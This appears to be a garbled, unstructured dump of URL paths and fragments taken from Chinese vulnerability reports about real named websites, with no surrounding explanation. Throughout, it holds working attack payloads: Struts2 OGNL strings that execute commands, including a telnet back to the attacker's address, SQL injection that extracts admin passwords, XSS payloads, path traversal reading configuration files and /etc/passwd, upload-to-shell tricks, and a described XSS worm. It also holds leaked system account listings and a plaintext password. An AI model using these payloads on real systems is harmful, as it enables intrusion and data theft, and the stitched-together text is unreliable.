\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ /qzone/client/photo/swf/UploadPhoto.swf /qzone/client/photo/swf/UploadPhoto.swf?init_fun=alert(/xss/) / //city.qianlong.com/mycity/Manage/FileSystem/UpFile_Iframe.asp /login.php(60.28.241.196) /html/index.html(60.28.241.199) /manage/menu.htm /mycity/manage/menu.asp /mycity/Manage/FileSystem/UpFile_Iframe.asp /zlz/ /portalgprs/ /PDA_NEWS_RESOURCE/ / /index.php?act=phpinfo /manage/Pinglun/opr_plun.asp?actions=check&ID=347829&pre_page= /20101223/n5842695075872.html /fckeditor/editor/下的Fckeditor上传文件都删除了。另,为保护厂商,其中一些信息没有透漏。求 me.alipay.com /gdutlx /direct/displayLogin.do /direct/manager/addpicture.jsp?menuid=45 /direct/savepicture.do?menuid=45 /intl/zh-CN/images/logo_cn.gif /intl/zh-CN/images/logo_cn.gif url('#default#time2') url('#default#time2') none /ispis/login/login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'whoami\'')(d))&(h) www.acheng.gov.cn/mail/sys_order/order.asp目录猜测此战采用了百度竟价站的基本结构,访问默认数据库地址地址sys_order/database/xuanboy.mdb /nginx-securit.html http://profile.baihe.com/new/Login.action /intl/zh-CN/images/logo_cn.gif /intl/zh-CN/images/logo_cn.gif /intl/zh-CN/images/logo_cn.gif /intl/zh-CN/images/logo_cn.gif /intl/zh-CN/images/logo_cn.gif /intl/zh-CN/images/logo_cn.gif /intl/zh-CN/images/logo_cn.gif url('#default#time2') url('#default#time2') / http://idea.cas.cn/login.action / /TR/xhtml1/DTD/xhtml1-transitional.dtd /1999/xhtml /feed/retweet/ /p/t/xxxxxxx): /index.php?c=share&a=index&pic=http://www.baidu.com"%20onerror="alert(/xss/)&url=http://www.baidu.com&site=&title= / /UserCenter/register.aspx /siteserver /manager/html/ /ispis/login/login.action /tiyan/cardlogin/login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) /mngr/user/logout.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) /pct/ /console /viewCreditsrank.php?creditsType=month&creditsKind=4 /twy/logout.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) /phpmyadmin/ /iSpaceWeb/logout.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) /user/index.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) /logout.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) /ukey/login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) /login.jsp /szbookmallcms/activity_net/compositionComment!list2.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) /pai/html/index.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) / www.diandian.com下的页面,该页面中含有博客介绍,但输出该变量没有过滤,造成xss。 /index.action / / /ewRc /1.js /sipo/index.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) /entlabreport/UserList.aspx /manager/login.do?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43mycmd\75\%27netstat\%27%27%29%28d%29%29&%28h%29%28%28%27\43myret\75@java.lang.Runtime@getRuntime%28%29.exec%28\43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27\43mydat\75new\40java.io.DataInputStream%28\43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27\43myres\75new\40byte[51020]%27%29%28d%29%29&%28k%29%28%28%27\43mydat.readFully%28\43myres%29%27%29%28d%29%29&%28l%29%28%28%27\43mystr\75new\40java.lang.String%28\43myres%29%27%29%28d%29%29&%28m%29%28%28%27\43myout\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27\43myout.getWriter%28%29.println%28\43mystr%29%27%29%28d%29%29 /dbank/web/trunk/webserver/WebContent/file /dbank/web/trunk/webserver/WebContent/pc /main/open/view/index.action /graduateschool/common/index.jsp它的URL参数 /graduateschool/common/download.jsp?path=网报说明.ppt /graduateschool/common/download.jsp?path=../WEB-INF/web.xml没什么好东西 /graduateschool/common/download.jsp?path=../WEB-INF/struts-config.xml(不方便一一列举) /graduateschool/common/download.jsp?path=..\WEB-INF\classes\hibernate.cfg.xml /web/ArticleShow.action?id=5670 /admin/login.php /brand.php?brandid=1 /gsgm.asp?detailsid=17 /gsdt.asp?id=1 /show_details.asp?detailsid=1514 gov.cn WCM /wcm/ /wcm/console/auth/reg_newuser.jsp /wcm/file/read_file.jsp?FileName=U020120628383491551127/../../../../../Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx /robot/p4pages/related-question.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22%20telnet%20自己的IP%208888%20%22%29%27%29%28\u0023rt%20\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 / / /reportinputcommon.do /queryMoreAdvice.action /user/e.action /onlinetrain/foreground/beginStudyAction.action first’ selected’ text/html /admin/fckeditor/mkdir.ajax.php?basedir=upload/image/&newdir=shell.asp /indexph.action /action/tftj/index.action /Reg.action为漏洞网址,构造的post数据为: /themes/new,上传图片的那个form。 /content/200说的一致 /main.action /sxrd/sxrd/anwserFrontList.action /JFMXShowAction.action /site/guest/LDXX.action山西公安交警网 /v/a/list.action?channelTypeId=1 /registerAndLogin_add.action /play/channel.action?id=512&time=1229904000459831419 /shopping!clearItems.action /aspsearch!getTaobao.action /outer_chmore.action /portal/career/viewInquireCareer.action /pc/downloadClickupClient.action /hwatai/health/passport_download.action?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43mycmd\75\%27netstat\%27%27%29%28d%29%29&%28h%29%28%28%27\43myret\75@java.lang.Runtime@getRuntime%28%29.exec%28\43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27\43mydat\75new\40java.io.DataInputStream%28\43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27\43myres\75new\40byte[51020]%27%29%28d%29%29&%28k%29%28%28%27\43mydat.readFully%28\43myres%29%27%29%28d%29%29&%28l%29%28%28%27\43mystr\75new\40java.lang.String%28\43myres%29%27%29%28d%29%29&%28m%29%28%28%27\43myout\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27\43myout.getWriter%28%29.println%28\43mystr%29%27%29%28d%29%29 /portal/comm/download.action?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43mycmd\75\%27netstat\%27%27%29%28d%29%29&%28h%29%28%28%27\43myret\75@java.lang.Runtime@getRuntime%28%29.exec%28\43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27\43mydat\75new\40java.io.DataInputStream%28\43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27\43myres\75new\40byte[51020]%27%29%28d%29%29&%28k%29%28%28%27\43mydat.readFully%28\43myres%29%27%29%28d%29%29&%28l%29%28%28%27\43mystr\75new\40java.lang.String%28\43myres%29%27%29%28d%29%29&%28m%29%28%28%27\43myout\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27\43myout.getWriter%28%29.println%28\43mystr%29%27%29%28d%29%29 /index.action /kfcios/RegAction/login.action?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43mycmd\75\%27ipconfig\%27%27%29%28d%29%29&%28h%29%28%28%27\43myret\75@java.lang.Runtime@getRuntime%28%29.exec%28\43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27\43mydat\75new\40java.io.DataInputStream%28\43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27\43myres\75new\40byte[51020]%27%29%28d%29%29&%28k%29%28%28%27\43mydat.readFully%28\43myres%29%27%29%28d%29%29&%28l%29%28%28%27\43mystr\75new\40java.lang.String%28\43myres%29%27%29%28d%29%29&%28m%29%28%28%27\43myout\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27\43myout.getWriter%28%29.println%28\43mystr%29%27%29%28d%29%29 /account/loginUI.action?change_locale=fr /settings/ /272288/ xxxxx.tuchong.com/?view=list tuchong.com /pages/selfservice/payment/index.action?paybean.comeflag=DH&paybean.randomnum=1 /exam/index.action /newsDetail.asp?id=67 /jmCook.asp?jmdcw=67丢到穿山甲里面去看看 /kttj/indexChinaMobile.aspx /t/20050708/02/4130391.html /anglee2010/item/dffb1f122f4688a2ffded55a /saas/editEnterpriseRegister.action /specapp/index.php/%22onmouseover=prompt%289537209%29%3E /specapp/index.php(留言随意XSS)很恐怖 /tims/blueprint/auditing/download.action?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43mycmd\75\%27netstat\%27%27%29%28d%29%29&%28h%29%28%28%27\43myret\75@java.lang.Runtime@getRuntime%28%29.exec%28\43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27\43mydat\75new\40java.io.DataInputStream%28\43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27\43myres\75new\40byte[51020]%27%29%28d%29%29&%28k%29%28%28%27\43mydat.readFully%28\43myres%29%27%29%28d%29%29&%28l%29%28%28%27\43mystr\75new\40java.lang.String%28\43myres%29%27%29%28d%29%29&%28m%29%28%28%27\43myout\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27\43myout.getWriter%28%29.println%28\43mystr%29%27%29%28d%29%29 /login.action system_r:java_t:SystemLow-SystemHigh /index!serviceSelfYW.action /admin_login/login.asp /upload/asset)和Flash跨域通信的配置文件中(http://www.diandain.com/crossdomain.xml)允许的域名相同,只需上传一个SWF,就可以读到formKey了。把这SWF嵌入到blog页面中,读到访客的formKey,调用externalInterface把值给输到JS里,又能worm了吧。 /index.php/%22onmouseover=prompt%289537209%29%3E https://www.ezhangdan.com/login/toMemberReg.action /index.action /login.asp www.diandian.com这个域下。 www.diandian.com域下的xss或者其它方式来获取formkey才能进行后续的传播操作。 www.diandian.com域下的xss。 www.diandian.com域下搜索不到flash文件。 www.diandian.com /blog/fm/iframe/reggaesky /blog/fm/iframe/wooyuntest /js/app/fm.$6765.js /edit/02c85840-c297-11e1-9a22-782bcb38253b /./images/album/img60/1260/66481314675280_1.jpg /blog/fm/iframe/wooyuntest www.diandian.com /diandian.js /./images/album/img60/1260/66481314675280_1.jpg /diandian.js /jq.js /wall",function(rs) /customize/"+name,function(info) /blog/fm/iframe/wooyuntest\ none\ /n/customize/source",data,callback /n/customize /blog/fm/iframe/wooyuntest\ none\ /blog/fm/iframe/wooyuntest none /blog/fm/iframe/wooyuntest none /v1.0.0245/v/swf/loader.swf此FLash接受imglogo参数作为图片地址 /v1.0.0245/v/swf/loader.swf?VideoIDS=XMzU2MDk0MDQ0&winType=BDskin&embedid=MTI1LjExOS4xNTMuNDQCODkwMjM1MTECAg%3D%3D&wd=&partnerid=XOTcy&&imglogo=http://localhost:8080/flashsec/redirect_evil_url.swf /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=abs /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=abs /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=abs /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=abs /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=abs%28jjdm-%28length%28%28select%20distinct%20table_name%20from%20information_schema.tables%20where%20table_schema=0x66696E616E6365%20limit%201,1%29%29=6%29*8000%29&ordertype=asc /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=abs alert(document.cookie);void(0) /index.action /emall/index.action /emall/index.action /tag/xxxx /tag/wooyunworm的源码)。 /edit/3ba11ee0-c251-11e1-90a9-782bcb32ff27 /tag/wooyunworm /tag/wooyunworm /ease-web/index.action /inviteall!nologin.action?uid=47A41632FF59E7EF601940895D875512 /beian/user/registeraction.action /EassolSSOWeb/registerAction.action?from=englishOK /Knowledge/know/searchAction.action?word=3G&fieldName=createDate&fieldSort=desc /site/guest/searchAction.action?curPage=1&contentValue= /spgbid/homeAction/searchAction.action?search=search&msg= /SearchAction.action?query=%E5%85%A8%E9%83%A8%E6%B4%BB%E5%8A%A8&category=%E7%99%BB%E5%B1%B1&pager.offset=64 /shop/store!toApply.action /cjh/cjh!toApply.action /Register.action /front/userlogin!register.action /register.action?memId=103658918 /register.action?register.activity.id=1736738&user.id=2 /register.action /xxfw/register.action /a/pre-register.action?redirectUrl=http%3A//www.qiaogu.com/ /account/register.action /register.action /www/account/register.action /register.action /user/register.action /QQcaca/userManage/register.action /system/register.action /service/red_present_step1.xhtml?BON_ID=120525000*************&BON_NM=全省***&BON_AMT=20&ISS_ID_NM=移动&EXP_DT=20120731 /service/red_present_step2.xhtml?RCV_MBL_NO=接受号码&MBL_NO=赠送号码&BON_ID=120525000*************&&BON_NM=12580**********&BON_AMT=2&ISS_ID_NM=%C9%CF&EXP_DT=20120731&CHECK_MBL_NO=接受号码 /mayi.website/upload/20120630042642423.jpg上传好了这样一个图片文件然后在图片后缀的后面加上1.phphttp://www.gamemayi.com/mayi.website/upload/20120630042642423.jpg/1.php服务器就会让这张图片以PHP的方式运行进而获取到网站权限 /mayi.website/web!index.action alert(document.cookie);void(0) alert(document.cookie);void(0) /plus/search.php?keyword=d 218.28.225.250 / / /city_comment_614#i_comment /test.php?cookie= /luxury/list.php?type=category&cid=2 /luxury/list.php?type=country&gid=11 /main/c?db=ifeng&bid=11026,10796,2433&cid=1420,61,1&sid=23419&advid=318&camid=2539&show=ignore&url=http://www.wooyun.org /user/myword.php?pno=1 common/common_info.action?wid= /query/business/query/queryTableAction$searchTable3.action /epp-ppp/pm/notice/notice!viewBlockNotice.action?curId=4&locMsg=2*/3,schemaname,null,null,null,null,null%20from%20syscat.schemata%20fetch%20first%201%20rows%20only--&ids=4|3|2%29%20and%201=2%20union%20select/* /act2012/jump/?url=http://gotofun.cn/url?15329&subtemplate=gray&evil=0 /exploits/19525/ /app/appOut.action /?s=vod-read-id-1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(0x40,admin_id,0x40,admin_name,0x40,admin_pwd,0x40),28,29%20from%20pp_admin--.html /passport/腾讯后台任意QQ号码登陆但是没权限 /nantiankb/admin/article/article/DownloadTFile.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'netstat\'')(d))&(h) /cps/membercenter/memberinfo.action /cps/membercenter/account.action /roco/search.php?s=/module/action/param1/${@phpinfo() /login.jsp /redir.php?url=http://www.baidu.com /portalhx/WapSiteindex.action /.svn/text-base/validate_login.jsp.svn-base /Views/findpwd.aspx,利用通配符加短标签构造出http://perfectrisingstar.wanmei.com/Views/fa*~1*/.aspx访问这个地址IIS会返回给我们一个错误,大多数是bad /Views/fi*~1*/.aspx返回404,说明存在以fi开头的文件,利用这个特性我们仅需要对每一位循环遍历26个字母就可以获取文件短文件名称,由于短文件名的规律为前6个字符+~1-9+扩展名前三位,我们可以根据短文件名结果推测或配合字典暴力猜测文件全名,测试后缀名构造http://perfectrisingstar.wanmei.com/Views/findpw~1.*/.aspx即可 /Views/findpw~1.%3f%3f/.aspx单独位匹配测试 /index.action?templatePageDO.templatePageId=3767&templatePageDO.shopId=10921 / com.douban.shuo/shared_prefs/app.Login.xml /lmzq!intro.action /login /index.php?module=Users&action=Login /shell.php /SFMobile.xml /shopping/account.action /sxscz/opinion_question.action?optionId=4028b394375397fb013753daa7860005 /imageland/exhibition/detail.action?exhibitionId=295 /publish/login.php /news/s7/show.php?name=5 123.125.116.190 /phpinfo.php /用户后台中 douban.fm/js/.svn/entries /game/tag/softList.action /XLInformation/getSchoolContent.action /view.do?code=146219443&v=2 /view.do?v=2&sid=431b965d858e452c8f4453***(就是此处的SID)&code=146240234 img.php*/ image/png /setup/ /sc/s/babyfifa/upload.html /sc/s/babyfifa/upload.html /viewthread.php?tid=791 xunlei..com /code_svn/ test /gzZhengWu.action /onShow.action /cn/dosearch/?srchtxt=%22%3E%3Cscript%3Ealert%28/wooyun/%29%3C%2Fscript%3E%3C&srchtype=fulltext /%3c/%61%3e%3c%61%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%78%73%73%27%29%3c/%73%63%72%69%70%74%3e%3c/%61%3e /%61%3e%3c%61%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%78%73%73%27%29%3c/%73%63%72%69%70%74%3e%3c/%61%3e /photowall.aspx?AreaKeyWord=142 x:502:0::/www/bbs.weiphone.com/:/bin/bash x:503:503::/www/bbs.weand.com:/sbin/nologin x:504:500::/www:/bin/bash x:505:505::/www/act.weiphone.com/:/sbin/nologin /api/Xmlrpc/index/ / /member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@ /member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@ /xml-entity-injection.html /vuldb/ssvid-60242 /security/advisory/ZF2012-01 shop.adidas.cn shop.adidas.cn/api/Xmlrpc/index/ shop.adidas.cn/info.php shop.adidas.cn/api/Xmlrpc/index拿到passwd /etc/passwd x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:81:81:System /:/sbin/nologin x:113:113:usbmuxd /:/sbin/nologin x:16:16:Special /home/oprofile:/sbin/nologin x:32:32:Rpcbind /var/cache/rpcbind:/sbin/nologin x:170:170:Avahi /var/lib/avahi-autoipd:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:499:496:RealtimeKit:/proc:/sbin/nologin x:173:173::/etc/abrt:/sbin/nologin x:96:96::/var/lib/hsqldb:/sbin/nologin x:498:76:"Saslauthd /sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:70:70:Avahi /var/run/avahi-daemon:/sbin/nologin x:89:89::/var/spool/postfix:/sbin/nologin x:497:494:Owner /var/lib/qpidd:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:65534:65534:Anonymous /var/lib/nfs:/sbin/nologin x:38:38::/etc/ntp:/sbin/nologin x:59:59:Account /dev/null:/sbin/nologin x:75:75:radvd /:/sbin/nologin x:107:107:qemu /:/sbin/nologin x:27:27:MySQL /var/lib/mysql:/bin/bash x:496:493:PulseAudio /var/run/pulse:/sbin/nologin x:42:42::/var/lib/gdm:/sbin/nologin x:500:500:Guest:/home/xguest:/bin/bash x:155:155:Systemtap /var/lib/stap-server:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:495:487:UUID /var/lib/libuuid:/sbin/nologin x:72:72::/:/sbin/nologin x:501:501::/home/userweb:/bin/bash x:502:502::/dev/none:/sbin/nologin x:503:503::/home/nomal:/bin/bash x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:504:504::/home/bysoft:/bin/bash /read=convert.base64-encode/resource=file:///etc/passswd /index.php/adi_admin_das_online /ESCM/biddoc/publicDetailTest.do?id=1007 /robots.txt/数据流.php /Style/CatalogSubscribe.aspx?CatalogName= /Catalog/F90411/cover.html&Picture=http://img.m18.com/IMG2008/catalog/F90411.jpg /Manager/default.aspx /comment/hotcomment.htm?from=home /comment/hotcomment.htm?from=list&size=6&class=N1 /product!product.action?productId=117792&expertId=1 /gallery.php?action=step2 /ArticleImage/669c/6e31b0f6/xkdbaattomdotcom/c4ca.txt /ArticleImage/669c/6e31b0f6/xkdbaattomdotcom/c4ca.php /log/nokiaemail_20120527.log(最前面不懂了) /log/nokiaemail_20120707.log /flagpro!apple.action?productId=32929&expertId=331 /content/508 /survey/static/qiyi_logo.png/test.php /?1%3C/title%3E1%22/%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E /index/top50.htm?cid=1&dim=%22%20onmouseover%3dalert%28/xss/%29%20bad%3d%22 /product.php?id=2 /read=convert.base64-encode/resource=file:///etc/passwd /cn/index.php/pullin_china_cn/api/xmlrpc /index.php/pullin_hk_en/api/xmlrpc /etc/passwd /api/xmlrpc /etc/passwd /bbs/ /forumdata/1.txt 2.gy/ehAM /aptitude/manage / /bosh /protocol/httpbind im.wo.com.cn/woclient im.wo.com.cn/woclient xmpp:receipts /brand.html?layout=dvhddetails&hdid=161 /system/gotoLogin.action /speed/agent/task.htm /article.php?id=40075 /dianping/attraction!list.action?id=525 /index.do /soft/list/category/nodeList.php?categoryId=1401&level=2&nodeId=257/@@version /navigate/pic/soft.png/.php /ucweather/images/wea_images_b/3.gif/.php /images/baidu_mp3.gif/.php /html/1.jpg/.php /public/images/uclogo.gif/.php /Article/html/3/8/2010/28250.htm /huodong/pccc/lyricWall.action /?sa=t124v71d6397935a&vt=3 /show.php?id=10 /admin/admin_login.php /ty/up/2007-07-25/U1165P6T64D35127F1322DT20080124105556.txt /source/account/signin.aspx?ReturnUrl=/MS_GINS/source/home/home.aspx?pg=1 /rpa/ CNF600 welcome123 /html/doha2006/login.php sinanews 